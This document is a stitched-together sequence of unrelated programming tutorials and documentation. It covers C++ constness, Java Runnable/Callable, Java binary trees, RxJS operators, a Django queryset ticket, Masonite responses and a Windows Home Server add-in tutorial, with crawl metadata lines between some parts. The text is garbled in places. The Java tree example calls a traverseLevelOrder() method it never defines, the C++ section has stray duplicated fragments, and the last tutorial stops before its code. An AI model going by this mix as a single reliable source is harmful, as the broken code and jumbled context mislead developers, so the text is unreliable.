Okay, physical constness is quite easy to get but logical constness. Let me modify the previous example a little bit. Assume, I want to change the attribute val in a const method.
// mutable.cpp
#include <iostream>
struct Immutable{
mutable int val{12}; // (1)
void canNotModify() const {
val = 13;
}
};
int main(){
std::cout << std::endl;
const Immutable immu;
std::cout << "val: " << immu.val << std::endl;
immu.canNotModify(); // (2)
std::cout << "val: " << immu.val << std::endl;
std::cout << std::endl;
}
The specifier mutable (1) made the magic possible. The const object can, therefore, invoke the const method (2) which modifies val.
mutable
val
Here is a nice use-case for mutable. Imagine, your class has a read operation which should be const. Because you use the objects of the class concurrently you have to protect the read method with a mutex. So the class gets a mutex and you lock the mutex in the read operation. Now, you have a problem. Your read method cannot be const because of the locking of the mutex. The solution is to declare the mutex as mutable.
Here is a sketch of the use-case. Without mutable, this code would not work
struct Immutable{
mutable std::mutex m;
int read() const {
std::lock_guard<std::mutex> lck(m);
// critical section
...
}
};
Okay, this rule is quite obvious. If you pass pointers or references to consts to a function, the intention of the function is obvious. The pointed or referenced to object would not be modified.
void getCString(const char* cStr);
void getCppString(const std::string& cppStr);
Are both declarations equivalent? Not one hundred per cent. In the case of the function getCString, the pointer could be a null pointer. This means you have to check in the function vai if (cStr) ....
getCString
if (cStr) ....
But there is more. The pointer and the pointee could be const.
Here are the variations:
const char* cStr
cStr
char
const;
char* const cStr
const char* const cStr
Too complicated? Read the expressions from right-to-left. Still too complicated? Use a reference to const.
I want to present the next two rules from the concurrency perspective. Let me do it together.
If you want to share a variable immutable between threads and this variable is declared as const, you are done. You can use immutable without synchronisation and you get the most performance out of your machine. The reason is quite simple. To get a data race, you should have a mutable, shared state.
immutable
Data Race
There is only one problem to solve. You have to initialise the shared variable in a thread-safe way. I have at least four ideas in my mind.
std::call_once
std::once_flag
static
A lot of people oversee the variant 1 which is quite easy to do right. You can read more about the thread-safe initialisation of a variable in my previous post: Thread-safe Initialization of Data.
Rule Con.5 is about variant 4. When you declare a variable as constexpr constexpr double totallyConst = 5.5;, totallyConst is initialised at compile-time and, therefore, thread-safe.
constexpr double totallyConst = 5.5;
That was not all to constexpr. The C++ core guidelines forgot to mention one import aspect of constexpr in concurrent environments. constexpr functions are sort of pure. Let's have a look at the constexpr gcd .
constexpr gcd
constexpr int gcd(int a, int b){
while (b != 0){
auto t= b;
b= a % b;
a= t;
}
return a;
}
First, what does pure mean? And second, what does sort of pure mean?
A constexpr function can be executed at compile time. There is no state at compile time. When you use this constexpr function at runtime the function is not per se pure. Pure functions are functions that return always the same result when given the same arguments. Pure functions are like infinitely large tables from which you get your value. The guarantee that an expression returns always the same result when given the same arguments is called referential transparency.
Pure functions have a lot of advantages:
In particular, the point 2 makes pure functions so precious in concurrent environments. The table shows the key points of pure functions.
I want to stress one point. constexpr functions are not per se pure. They are pure when executed at compile time.
That was is. I'm done with constness and immutability in the C++ core guidelines. In the next post, I start to write about the future of C++: templates and generic programming. 2762
All 1580498
Currently are 173 guests and no members online
Kubik-Rubik Joomla! Extensions
Read more...
Read more... | http://www.modernescpp.com/index.php/c-core-guidelines-rules-for-constants-and-immutability | CC-MAIN-2019-09 | refinedweb | 1,050 | 68.36 |
Runnable, Callable, FutureTask, ExecutorService and thread pool
Some notes on Java concurrency, starting with Runnable vs Callable:
(1), Runnable.run() does not return a value; Callable<T>.run() returns a value of type T. Callable<T> is a parameterized type whose type parameter indicates the return type of its run method. Runnable cannot be parameterized.
(2), Runnable.run() cannot throw any checked exception; Callable<T>.run() can throw checked and unchecked exceptions.
(3), so it seems Callable is more powerful than Runnable. But you cannot just replace all use of Runnable with Callable. For example, in new Thread(runnable). You cannot instantiate a new thread with Callable.
(4), Callable is introduced in Java SE 5, as part of java.util.concurrent library. Callable is mainly intended to use with ExecutorService, which is a higher level service than the direct manipulation of Thread. Both Runnable and Callable can be submitted to ExecutorService for (usually asynchronous) execution.
(5), java.util.concurrent.Executors (a util class similar to Collections, Arrays) has methods to upgrade a Runnable to Callable, but not the other way.
Callable<Object> callable(Runnable task)The Callable converted from
<T> Callable<T> callable(Runnable task, T result)
callable(Runnable)returns null. The Callable converted from
callable(Runnable, T)returns T. However, this return value that was passed in by the client is not the real result of executing task. Its purpose is to tell the client that the return type will be Future<T>. In order to obtain the real result, the client still needs to arrange for a thread-safe shared data storage, e.g., a final or volatile field of Runnable impl. Therefore, the converted Callable is still a Runnalbe in its core.
(6) FutureTask is another artifact involving both Callable and Runnable. FutureTask class implements RunnableFuture interface, which in turn extends both Runnable and Future interfaces. So FutureTask is a Runnable by inheritance, and can be passed to new Thread(futureTask), or ExecutorService.submit(futureTask).
FutureTask has a Callable<V> by composition as FutureTask's constructor takes Callable<V> as a param. FutureTask also has another constructor that takes 2 params (Runnable, V), which are simply converted to Callable via Executors.callable(Runnable, V). In fact, the same pattern is employed in java.util.concurrent wherever a method is overloaded with (Callable) and (Runnable, V).
(7), Runnable and Callable run() method takes no param. Why? For one thing, there is no way to know which types are to be passed in. The best we can do is probably Object[] if we were to add params to it. More importantly, it would export state from the calling thread to the task thread, and entails synchronization between the 2 sides. I guess this is why the plain old Runnable.run() takes no param and returns void. In Java 5 to balance simplicity and usefulness, Callable was added to return a result.
(8), how can a task be performed without any params passed to run()? The typical answer is to pass any required data in when instantiating the Callable or Runnable impl class via its constructor. For example,
public class RunnableImpl implements Runnable {If RunnableImpl is a static inner class, its run() method can directly reference any static fields in the enclosing class. If RunnableImpl is an instance inner class, its run() method can directly reference any static and instance fields in the enclosing class. If RunnableImpl is an anonymous inner class, its run() method can directly reference any static and instance fields of the enclosing class, and any final local variables in the enclosing method.
private final List<String> names;
public RunnableImpl(List<String> names) {
this.names = names;
}
public void run() {...}
}
(9), you can call Thread.setUncaughtExceptionHandler, or Thread.setDefaultUncaughtExceptionHandler to handle exceptions from Runnable.run(). When using ExecutionService where you have no direct control of threads, you can use a custom ThreadFactory. Executors methods newCachedThreadPool, newFixedThreadPool, newScheduledThreadPool, newSingleThreadExecutor, newSingleThreadScheduledExecutor all take a custom ThreadFactory.
(10), Worker thread in thread pools and regular thread are different. A regular thread dies after its run method terminates and cannot be restarted. A worker thread does not die after the completion of the assigned task; it goes back to the thread pool. The main run method of a work thread is an infinite loop: taking a task from the work queue, and invoke the task's run method to do the task.
(11), ThreadLocal variables should be cleared up by the client once the task is done. Otherwise the left-over reference in worker threads prevent the referenced objects from being garbage-collected. Over time it may cause OutOfMemoryError.
(12), The thread pool default work queue in ExecutionService framework is unbounded. It means once the corePoolSize is reached, all subsequent requests will go into this unbound BlockingQueue, until some busy worker threads complete its task. No new worker threads will be created beyond corePoolSize, and maximumPoolSize is ignored in this case. For more details, see bug 6756747: java.util.concurrent.ThreadPoolExecutor doesn't create new worker when it should.
2 comments:
Callable.run() is quite misleading. Callable inteface provides .call() method instead.
Callable.run() is excellent.Understand the basics of thread first | http://javahowto.blogspot.com/2011/08/runnable-callable-futuretask.html | CC-MAIN-2014-42 | refinedweb | 860 | 67.55 |
Source codeEdit
#!/bin/csh alias commas "echo \!:1 | sed -e :a -e 's/\(.*[0-9]\)\([0-9]\{3\}\)/\1,\2/;ta'" # The program is to output a day-by-day account of the populations # until one of them dies off or the end of the observation period is # reached. # All reproductions and deaths occur overnight. # Any fractional fish are discarded. # These sharks only feed during the day. if ( $1 == 'default' ) then set sharks = 54 set guppies = 1000 set duration = 150 else printf "Please enter number of sharks: " set sharks = $< printf "Please enter number of guppies: " set guppies = $< printf "Number of days to observe: " set duration = $< endif set day = 0 while ( $day < $duration ) @ day = $day + 1 #print printf "Start of %3s Day: %15s sharks %15s guppies\n" $day `commas $sharks` `commas $guppies` if ( $sharks <= 0 || $guppies <= 0 ) then break endif # Each shark eats 5 guppies a day. @ guppies_eaten = ( $sharks * 5 ) @ guppies = ( $guppies - $guppies_eaten ) if ( $guppies < 0 ) then set guppies=0 endif #print printf "End of %5s Day: %15s sharks %15s guppies\n" $day `commas $sharks` `commas $guppies` if ( $sharks <= 0 || $guppies <= 0 ) then break endif # The guppies increase at a rate of 80% per day, # provided the shark population is less than 20 % of the guppy population. # Otherwise there is no increase in the guppy population. if ( ( $guppies / $sharks ) > 5 ) then @ guppy_plus = ($guppies * 80 ) / 100 @ guppies = ( $guppies + $guppy_plus ) endif # The sharks increase at a rate of 5% of the guppy population per day, # provided there are 50 or more guppies per shark. # Otherwise, the sharks die off at a rate of 50% per day. if ( ( $guppies / $sharks ) > 50 ) then @ shark_increase = ( $guppies / 20 ) @ sharks = ( $sharks + $shark_increase ) else @ sharks = ( $sharks / 2 ) endif end exit 0
LessonsEdit
- C shell does not have functions so all logic must be in-lined. An "alias" can be created to reuse code such as formating a number with commas using the "sed" program.
- Mathematical expression that are assigned to variable must with the "@" sign instead of the keyword "set".
- Notice that the syntax is closer to BASIC than the C language with regards to control statements. You must include the key word "then" after the "if" statement expression.
NotesEdit
- Bourne shell version by Chris F.A. Johnson from which this version was ported.
- The homework assignment that was the genesis of this program | http://en.m.wikibooks.org/wiki/C_Shell_Scripting/Guppies | CC-MAIN-2013-48 | refinedweb | 385 | 68.7 |
With this article I want to briefly and shortly describe the differences between the rxjs operators
tap,
map and
switchMap.
There are many blog posts out there which cover those topics already but maybe this helps to understand if the other posts did not help until here :)
Let us start and first create an observable of an array with
from()
import { from } from 'rxjs'; const observable$ = from([1, 2, 3]);
If we now subscribe to it we could do something with the values which get emitted
import { from } from 'rxjs'; const observable$ = from([1, 2, 3]); observable$.subscribe((item) => console.log(item));
In the console we should see the values
1,2,3 as an output.
Let us get to the first operator.
Tap
The first one is the
tap operator and it is used for side effects inside a stream. So this operator can be used to do something inside a stream and returning the same observable as it was used on. It runs a method to emit a plain isolated side effect.
import { from } from "rxjs"; import { tap } from "rxjs/operators"; from([1, 2, 3]) .pipe(tap(item => /* do something with value */)) .subscribe(item => console.log(item));
You can pass the
tap operator up to three methods which all have the
void return type. The original observable stays untouched. But that does not mean that you can not manipulate the items in the stream.
Let us use reference types inside a
tap operator. When using reference types the
tap operator can modify the properties on the value you pass in.
const objects = [ { id: 1, name: 'Fabian' }, { id: 2, name: 'Jan-Niklas' }, ]; const source$ = from(objects) .pipe(tap((item) => (item.name = item.name + '_2'))) .subscribe((x) => console.log(x));
Outcome:
{ id: 1, name: "Fabian_2" } { id: 2, name: "Jan-Niklas_2" }
So the
tap operator does run the callback for each item it is used on, is used for side effects but returns an observable identical to the one from the source.
Map
Let us move on and try another operator. Let us take
map instead of
tap now.
So we can take the same situation now and instead of
tap we use the
map operator. The code sample looks like this now:
import { from } from 'rxjs'; import { map } from 'rxjs/operators'; from([1, 2, 3]) .pipe(map((item) => item + 2)) .subscribe((item) => console.log(item));
Check the outcome now and see: The
map operator does have consequences on the output! Now you should see
3,4,5 in the console.
So what the
map operator does is: It takes the value from a stream, can manipulate it and passes the manipulated value further to the stream again.
Adding a number is one example, you could also create new objects here and return them etc.
So to manipulate the items in the stream the
map operator is your friend.
SwitchMap
So there is the
switchMap operator left. I personally needed a little time to get my head around this and I hope to clarify things here now. 😊
So let us took a look again at the
map operator.
import { from } from "rxjs"; import { map } from "rxjs/operators"; from([1, 2, 3]) .pipe(map(item => /* does something */)) .subscribe(item => console.log(item));
Now let us write the result of each line in a comment:
import { from } from 'rxjs'; import { map } from 'rxjs/operators'; // returns an observable from([1, 2, 3]) // getting out the values, modifies them, but keeps // the same observable as return value .pipe(map((item) => item + 1)) // resolving the observable and getting // out the values itself .subscribe((item) => console.log(item));
We know that a
subscribe does resolve an observable and gets out the values which are inside of the stream.
Let us now face a situation like this: You have a stream of a specific type, let us say a stream of numbers again. You need this numbers to do something else like passing it to a service to get an item based on that number but this service returns not a number like
item + 2 does but an observable again!
If you would use the
map operator here lets play that through and write the output in comments again:
import { from } from 'rxjs'; import { map } from 'rxjs/operators'; // returns an observable from([1, 2, 3]) // getting out the values, using them, but keeps the same observable as return value. // In addition to that the value from the called method itself is a new observable now, // so we are returning an observable of observable here! .pipe(map((item) => methodWhichReturnsObservable(item))) // resolving _one_ observable and getting // out the values itself .subscribe((item) => console.log(item));
What would the type of the
resultItem in the
subscribe be? We know that a
subscribe is resolving an observable, so that we can get to its values. But it is resolving one observable. We mapped our observable in a second observable because the
methodWhichReturnsObservable(item) returns - surprise surprise - another observable.
So what we want is kind of a
map operator, but it should resolve the first observable first, use the values and then switch to the next observable while keeping the stream! So that when we subscribe we get to the (real) values of the last observable. The
switchMap operator does exactly that.
So writing that whole thing with the
switchMap operator would be like:
import { from } from "rxjs"; import { switchMap } from "rxjs/operators"; // returns an observable from([1, 2, 3]) // getting out the values _and resolves_ the first // observable. As the method returns a new observable. .pipe(switchMap(item => methodWhichReturnsObservable(item)) // => Get the real values of the last observable .subscribe(resultItem => console.log(resultItem));
In the last subscribe the values are picked out of the last observable.
I hope to have this explained in an understandable way.
Thanks. | https://offering.solutions/blog/articles/2019/10/20/tap-map-switchmap-explained/ | CC-MAIN-2020-45 | refinedweb | 965 | 62.07 |
IsDirty and GetDirty
On 04/07/2014 at 02:57, xxxxxxxx wrote:
I like to check using a plugin or a script, whether the object has changed.
IsDirty is not giving me any information, so I use GetDirty and check whether that value has changed.
That is ok when in Model mode, but when in Polygon mode, the value returned by GetDirty is not changed when I move a polygon?
DIRTY_MATRIX and the others are all returning the same value.
How to check whether a polygon has moved, scaled or rotated?
import c4d from c4d import gui def main() : obj = doc.SearchObject("Cube") print "--- IsDirty ---" print "Get DIRTY_MATRIX", obj.GetDirty(c4d.DIRTY_MATRIX) print "Get DIRTY_SELECT: ", obj.GetDirty(c4d.DIRTY_SELECT) print "Get DIRTY_CACHE: ", obj.GetDirty(c4d.DIRTY_CACHE) print "Get DIRTY_CHILDREN: ", obj.GetDirty(c4d.DIRTY_CHILDREN) if __name__=='__main__': main()
On 04/07/2014 at 04:54, xxxxxxxx wrote:
IsDirty() should be used for Generator plugins only.
You know there is another one, DIRTYFLAGS_DATA, right? This one is changed
when the polygons or points changed of an object.
Best,
-Niklas | https://plugincafe.maxon.net/topic/8010/10407_isdirty-and-getdirty | CC-MAIN-2019-13 | refinedweb | 177 | 67.76 |
Hi,
> 1. I have a set of in-memory schema grammars for one or more namespaces. I
> always want to use this instead of the one specified in the xml instance
> doc.
> I can cache the in-memory grammars but would the SAX Parser automatically
> resolve the schema in the instance doc to the in-memory one.
> Since I would be writing a generic handler, I would not know the names of
> the exact schema locations specified in the instance document.
It will be based on namespace so will do what you want. Check out
usedCachedGrammarinParse.
> 2. Can I force validation on a xml which does NOT have a schemaLocation
> specified using the in-memory schema.
Yes, set validation to on. schemaLocation is only a hint.
> 3. What happens if the SAX parser has an error while grammars are cached.
> Are they cleared and the grammars have to be cached again.
No, they are still cached.
Gareth
--
Gareth Reakes, Managing Director Parthenon Computing
+44-1865-811184
---------------------------------------------------------------------
To unsubscribe, e-mail: xerces-c-dev-unsubscribe@xml.apache.org
For additional commands, e-mail: xerces-c-dev-help@xml.apache.org | http://mail-archives.apache.org/mod_mbox/xerces-c-dev/200404.mbox/%3C20040422030902.N99692@minotaur.apache.org%3E | CC-MAIN-2016-22 | refinedweb | 189 | 67.65 |
Trees in Java — How to Implement a Binary Tree?
If I had to pick the single most important topic in software development, it would be data structures. One of the most common and easiest ones is a tree — a hierarchical data structure. In this article, let’s explore Trees in Java.
- What is a Binary Tree?
- Types of Binary Tree
- Binary Tree Implementation
- Tree Traversals
- Applications of Binary Tree
What is a Binary Tree?
A is a non-linear data structure where data objects are generally organized in terms of hierarchical relationship. The structure is non-linear in the sense that, unlike Arrays, Linked Lists, Stack and Queues, data in a tree is not organized linearly. A binary tree is a recursive tree data structure where each node can have 2 children at most.
Binary trees have a few interesting properties when they’re perfect:
- Property 1: The number of total nodes on each “level” doubles as you move down the tree.
- Property 2: The number of nodes on the last level is equal to the sum of the number of nodes on all other levels, plus 1
Each data element stored in a tree structure called a node. A Tree node contains the following parts:
1. Data
2. Pointer to left child
3. Pointer to the right child
In Java, we can represent a tree node using class. Below is an example of a tree node with integer data.
static class Node {
int value;
Node left, right;
Node(int value){
this.value = value;
left = null;
right = null;
}
Now that you know what is a binary tree, let’s check out different types of binary trees.
Types of Binary Trees
Full Binary Tree
A full binary tree is a binary tree where every node has exactly 0 or 2 children. The example of fully binary tress is:
Perfect Binary Tree
A binary tree is perfect binary Tree if all internal nodes have two children and all leaves are at the same level. The example of perfect binary tress is:
Complete Binary Tree
A complete binary tree is a binary tree in which every level, except possibly the last, is completely filled, and all nodes are as far left as possible. An example of a complete binary tree is:
Now that you are aware of different types of binary trees, let’s check out how to create a binary tree.
Binary Tree Implementation
For the implementation, there’s an auxiliary Node class that will store int values and keeps a reference to each child. The first step is to find the place where we want to add a new node in order to keep the tree sorted. We’ll follow these rules starting from the root node:
- if the new node’s value is lower than the current node’s, go to the left child
- if the new node’s value is greater than the current node’s, go to the right child
- when the current node is null, we’ve reached a leaf node, we insert the new node in that position
Now let’s see how we can implement this logic with the help of an example:
package MyPackage;
public class Tree {
static class Node {
int value;
Node left, right;
Node(int value){
this.value = value;
left = null;
right = null;
}
}
public void insert(Node node, int value) {
if (value < node.value) { if (node.left != null) { insert(node.left, value); } else { System.out.println(" Inserted " + value + " to left of " + node.value); node.left = new Node(value); } } else if (value > node.value) {
if (node.right != null) {
insert(node.right, value);
} else {
System.out.println(" Inserted " + value + " to right of "
+ node.value);
node.right = new Node(value);
}
}
}
public void traverseInOrder(Node node) {
if (node != null) {
traverseInOrder(node.left);
System.out.print(" " + node.value);
traverseInOrder(node.right);
}
}
public static void main(String args[])
{
Tree tree = new Tree();
Node root = new Node(5);
System.out.println("Binary Tree Example");
System.out.println("Building tree with root value " + root.value);
tree.insert(root, 2);
tree.insert(root, 4);
tree.insert(root, 8);
tree.insert(root, 6);
tree.insert(root, 7);
tree.insert(root, 3);
tree.insert(root, 9);
System.out.println("Traversing tree in order");
tree.traverseLevelOrder();
}
}
Output:
Binary Tree Example
Building tree with root value 5
Inserted 2 to left of 5
Inserted 4 to right of 2
Inserted 8 to right of 5
Inserted 6 to left of 8
Inserted 7 to right of 6
Inserted 3 to left of 4
Inserted 9 to right of 8
Traversing tree in order
2 3 4 5 6 7 8 9
In this example, we have used in-order traversal to traverse the tree. The in-order traversal consists of first visiting the left sub-tree, then the root node, and finally the right sub-tree. There are more ways to traverse a tree. Let’s check them out.
Tree Traversals
Trees can be traversed in several ways: Let’s use the same tree example that we used before for each case.
Depth First Search
Depth-first search is a type of traversal where you go as deep as possible down one path before backing up and trying a different one. There are several ways to perform a depth-first search: in-order, pre-order and post-order.
We already checked out in-order traversal. Let’s check out pre-order and post-order now.
Pre-Order Traversal
In Pre-order traversal you visit the root node first, then the left subtree, and finally the right subtree. Here’s the code.
public void traversePreOrder(Node node) {
if (node != null) {
System.out.print(" " + node.value);
traversePreOrder(node.left);
traversePreOrder(node.right);
}
}
Output:
5 2 4 3 8 6 7 9
Post-Order Traversal
In Post-order traversal you visit left subtree first, then the right subtree, and the root node at the end. Here’s the code.
public void traversePostOrder(Node node) {
if (node != null) {
traversePostOrder(node.left);
traversePostOrder(node.right);
System.out.print(" " + node.value);
}
}
Output:
3 4 2 7 6 9 8 5
Breadth-First Search
This type of traversal visits all the nodes of a level before going to the next level. It is like throwing a stone in the center of a pond. The nodes you explore “ripple out” from the starting point. Breadth-First Search is also called level-order and visits all the levels of the tree starting from the root, and from left to right.
Applications of Binary Tree
Applications of binary trees include:
- Used in many search applications where data is constantly entering/leaving
- As a workflow for compositing digital images for visual effects
- Used in almost every high-bandwidth router for storing router-tables
- Also used in wireless networking and memory allocation
- Used in compression algorithms and many more
This brings us to the end of this ‘Trees in Java’ article.
Make sure you practice as much as possible and revert your experience. Java.
1. Object Oriented Programming
5. Java String
6. Java Array
8. Java Threads
9. Introduction to Java Servlets
10. Servlet and JSP Tutorial
11. Exception Handling in Java
12. Advanced Java Tutorial
13. Java Interview Questions
14. Java Programs
15. Kotlin vs Java
16. Dependency Injection Using Spring Boot
18. Top 10 Java frameworks
20. Top 30 Patterns in Java
21. Core Java Cheat Sheet
22. Socket Programming In Java
25. Library Management System Project in Java
26. Java Tutorial
27. Machine Learning in Java
28. Top Data Structures & Algorithms in Java
29. Java Developer Skills
30. Top 55 Servlet Interview Questions
32. Java Strings Cheat Sheet
34. Java Collections Interview Questions and Answers
35. How to Handle Deadlock in Java?
36. Top 50 Java Collections Interview Questions You Need to Know
37. What is the concept of String Pool in Java?
38. What is the difference between C, C++, and Java?
39. Palindrome in Java- How to check a number or string?
40. Top MVC Interview Questions and Answers You Need to Know
41. Top 10 Applications of Java Programming Language
42. Deadlock in Java
43. Square and Square Root in Java
45. Operators in Java and its Types
47. Binary Search in Java
48. MVC Architecture in Java
49. Hibernate Interview Questions And Answers
Originally published at on September 3, 2019. | https://medium.com/edureka/java-binary-tree-caede8dfada5?source=post_internal_links---------1---------------------------- | CC-MAIN-2020-50 | refinedweb | 1,380 | 67.35 |
Opened 3 years ago
Closed 3 years ago
Last modified 3 years ago
#21643 closed Bug (fixed)
QuerySets that use F() + timedelta() crash when compiling their query more than once
Description
Attachments (2)
Change History (14)
Changed 3 years ago by
comment:1 Changed 3 years ago by
Changed 3 years ago by
Regression test.
comment:2 Changed 3 years ago by
Verified the test and the rest of the test suite on SQlite.
comment:3 Changed 3 years ago by
Wouldn't it be better to use just node.children[-1] instead of .pop()?
comment:4 Changed 3 years ago by
I've thought about that, but then the datetime value gets put in the query the second time (and incorrectly) in evaluate_node. There's probably a better way to do this, but I'm not exactly knowledgeable enough about Django internals to figure it out. The patch attached works as a quick-and-easy fix.
comment:5 Changed 3 years ago by
Sorry, I meant the timedelta value.
comment:6 Changed 3 years ago by
OK, good enough for me. Is this a regression in 1.6 or has this bug existed for a longer time (that is, does this need to be backpatched to 1.6)?
comment:7 Changed 3 years ago by
Google seems to find reports of the error from way back in December 2011. The code in question hasn't been touched since it appeared with the introduction of support for F() + timedelta(). Looks like it's been this way for years.
comment:8 Changed 3 years ago by
comment:9 Changed 3 years ago by
This is a regression in 1.6, I believe due to the deep copy changes when cloning querysets. I confirmed that
F() + timedelta() does work in 1.5.
Previously, the
DateModifierNode expression would have been deep copied every time a queryset was cloned, so it would never have been evaluated twice.
So I think this should be backported.
Also #22101 was a duplicate.
comment:10 Changed 3 years ago by
The test from the fix already applied also fails in 1.5, but the following test passes in 1.5 and fails in 1.6 showing that this is a regression.
def test_query_clone(self): # Ticket #21643 qs = Experiment.objects.filter(end__lt=F('start') + datetime.timedelta(hours=1)) qs2 = qs.all() list(qs) list(qs2)
Is it enough to back port the existing commit, or should this new test also be committed and back ported?
Could you write a regression test that demonstrates the problem and proves it's fixed? | https://code.djangoproject.com/ticket/21643 | CC-MAIN-2017-17 | refinedweb | 431 | 74.19 |
Most of the responses you will work with simply involve returning various data types / classes / objects in the controller method. For example, you may be used to returning a
view.render() object in the controller method. This will return a
View instance which Masonite will extract out the rendered html template from it.
Below is a list of all the responses you can return
You can simply return a string which will output the string to the browser:
def show(self):return 'string here'
This will set headers and content lengths similiar to a normal HTML response.
You can return an instance of a
View object which Masonite will then pull the HTML information that Jinja has rendered. This is the normal process of returning your templates. You can do so by type hinting the view class and using the render method:
from masonite.view import Viewdef show(self, view: View):return view.render('your/template', {'key': 'value'})
Notice you can also pass in a dictionary as a second argument which will pass those variables to your Jinja templates.
There are a few ways to return JSON responses. The easiest way is to simply return a dictionary like this:
def show(self):return {'key': 'value'}
This will return a response with the appropriate JSON related headers.
Similiarly you can return a list:
def show(self):return [1,2,3,4]
If you are working with models then its pretty easy to return a model as a JSON response by simply returning a model. This is useful when working with single records:
from app.User import User# ...def show(self):return User.find(1)
This will return a response like this:
{"id": 1,"name": "Brett Huber","password": "...","remember_token": "...","verified_at": null,"created_at": "2019-08-24T01:26:42.675467+00:00","updated_at": "2019-08-24T01:26:42.675467+00:00",}
If you are working with collections you can return something similiar which will return a slightly different JSON response with several results:
from app.User import User# ...def show(self):return User.all()
Which will return a response like:
[{"id": 1,"name": "Brett Huber","password": "...",...},{"id": 2,"name": "Jack Baird","password": "...",...},...}]
If you need to paginate a response you can return an instance of
Paginator. You can do so easily by using the
paginate() method:
from app.User import User# ...def show(self):return User.paginate(10)
The value you pass in to the paginate method is the page size or limit of results you want to return.
This will return a response like:
{"total": 55,"count": 10,"per_page": 10,"current_page": 1,"last_page": 6,"from": 1,"to": 10,"data": [{"id": 1,"name": "Brett Huber","password": "...",...},{...}
You can override the page size and page number by passing in the appropriate query inputs. You can change the page you are looking at by passing in a
?page= input and you can change the amount of results per page by using the
?page_size= input.
If you are building an API this might look like
/api/users?page=2&page_size=5. This will return 5 results on page 2 for this endpoint.
You can also return a few methods on the request class. These are mainly used for redirection.
For redirecting to a new route you can return the
redirect() method:
from masonite.request import Request# ...def show(self, request: Request):return request.redirect('/some/route')
There are several different ways for redirecting like redirecting to a named route or redirecting back to the previous route. For a full list of request redirection methods read the Request Redirection docs.
The response class is what Masonite uses internally but you can explicit use it if you find the need to. A need might include setting a response in a middleware or a service provider where Masonite does not handle all the response converting for you. It is typically used to condense a lot of redundant logic down throughout the framework like getting the response ready, status codes, content lengths and content types.
Previously this needed to be individually set but now the response object abstracts a lot of the logic. You will likely never need to encounter this object during normal development but it is documented here if you need to use it similarly to how we use it in core.
We can set a JSON response by using the
json() method. This simply requires a dictionary:
from masonite.response import Responsedef show(self, response: Response):return response.json({'key': 'value'})
This will set the
Content-Type,
Content-Length, status code and the actual response for you.
Keep in mind this is the same thing as doing:
def show(self):return {'key': 'value'}
Since Masonite uses a middleware that abstracts this logic.
The
view() method either takes a
View object or a string:
from masonite.response import Responsefrom masonite.view import Viewdef show(self, response: Response, view: View):return response.view('hello world')def show(self, response: Response, view: View):return response.view(view.render('some.template'))
Status codes can be set in the controller methods by 1 of 2 ways. The first way is to use the response object like above but set a
status= parameter. Something like thihs:
from masonite.response import Responsefrom masonite.view import Viewdef show(self, response: Response, view: View):return response.view('hello world', status=401)
The second way is to use a normal response but return a tuple: The above example might look something like this:
from masonite.response import Responsefrom masonite.view import Viewdef show(self, response: Response, view: View):return 'hello world', 401
You can also use some very basic URL redirection using the response object:
from masonite.response import Responsedef show(self, response: Response):return response.redirect('/some/route')
Responsable classes are classes that are allowed to be returned in your controller methods. These classes simply need to inherit a
Responsable class and then contain a
get_response method.
Let's take a look at a simple hello world example:
from masonite.response import Responsableclass HelloWorld(Responsable):def get_response(self):return 'hello world'
This class can now be returned in a controller method
from some.place import HelloWorlddef show(self):return HelloWorld()
Masonite will check if the response is an instance of
Responsable and run the
get_response method. This will show "Hello world" to the browser. This is actually how Masonites view class and mail classes work so you can see how powerful this can be.
You can also return mailables. This is great if you want to debug what your emails will look like before you send them. You can do so by simply returning the mailable method of the mail class:
from app.mailables import WelcomeEmaildef show(self, mail: Mail):return mail.mailable(WelcomeEmail())
This will now show what the email will look like.
Sometimes you will want to return an image or a file like a PDF file. You can do with Masonite pretty easily by using the
Download class. Simply pass it path to a file and Masonite will take care of the rest like setting the correct headers and getting the file content
from masonite.response import Downloaddef show(self):return Download('path/to/file.png')
This will display the image or file in the browser. You can also force a download in 1 of 2 ways:
from masonite.response import Downloaddef show(self):return Download('path/to/file.png').force()return Download('path/to/file.png', force=True)
Lastly you can change the name of the image when it downloads:
from masonite.response import Downloaddef show(self):return Download('path/to/file.png').force()return Download('path/to/file.png', name="new-file-name.jpg", force=True) | https://docs.masoniteproject.com/advanced/responses | CC-MAIN-2020-34 | refinedweb | 1,274 | 58.28 |
Writing the Console Tab Code
The Console tab that you create in this tutorial allows end users to retrieve information about Windows Home Server objects and then display that information in the Console tab pane area. The Console tab also allows end users to show an associated Settings tab.
To provide this functionality, you need to write code that responds to actions that end users take on your Console tab.
Write the Console Tab application code
With Visual Studio open to the SDKSample project that you created in Setting Up an Add-In Solution, right-click HomeServerTabExtender.cs (HomeServerTabExtender.vb in Visual Basic) in Solution Explorer, and then click View code from the popup menu.
Before you begin adding code for your Console tab, add the appropriate
using statements (
Imports in Visual Basic) to your code file:
Step 1: Declare a class that implements the IConsoleTab interface
To create a Console tab, you must create a class that implements the
Microsoft.HomeServer.Extensibility.IConsoleTab interface. The IConsoleTab interface contains methods and properties that all Console tabs should contain. Later in this topic, you implement the methods and properties of the interface.
Declare a class that implements the IConsoleTab interface. Delete the existing class declaration for
Class1, and replace it with the following:
Step 2: Code the class fields and the HomeServerTabExtender constructor
HomeServerConsole.exe is the program that runs the Windows Home Server Console. When HomeServerConsole.exe finds the
HomeServerTabExtender class inside your .dll, it calls the
HomeServerTabExtender class constructor to initialize your tab. HomeServerConsole.exe passes in values for the width, height, and Console Services objects for your Console tab as parameters to the constructor call.
In this step, you create three private fields in the
HomeServerTabExtender class. The first private field holds the reference to the IConsoleServices object that is passed in with the constructor call. The second private field references the instance of the user control,
ShowWHSInfoPanel, that appears in the Console tab pane area. Because the Console tab needs to access information about Windows Home Server objects on the server, you create a third private field for an instance of WHSInfoClass. This is a
Microsoft.HomeServer.SDK.Interop.v1 type that provides methods to get information about several Windows Home Server objects.
After creating the private fields, you code the
HomeServerTabExtender constructor, which must have the following signature:
In the constructor, initialize each of the private fields, and hook up event handlers (that you code in the next step) for the button click events for all three buttons on the instance of the
ShowWHSInfoPanel user control.
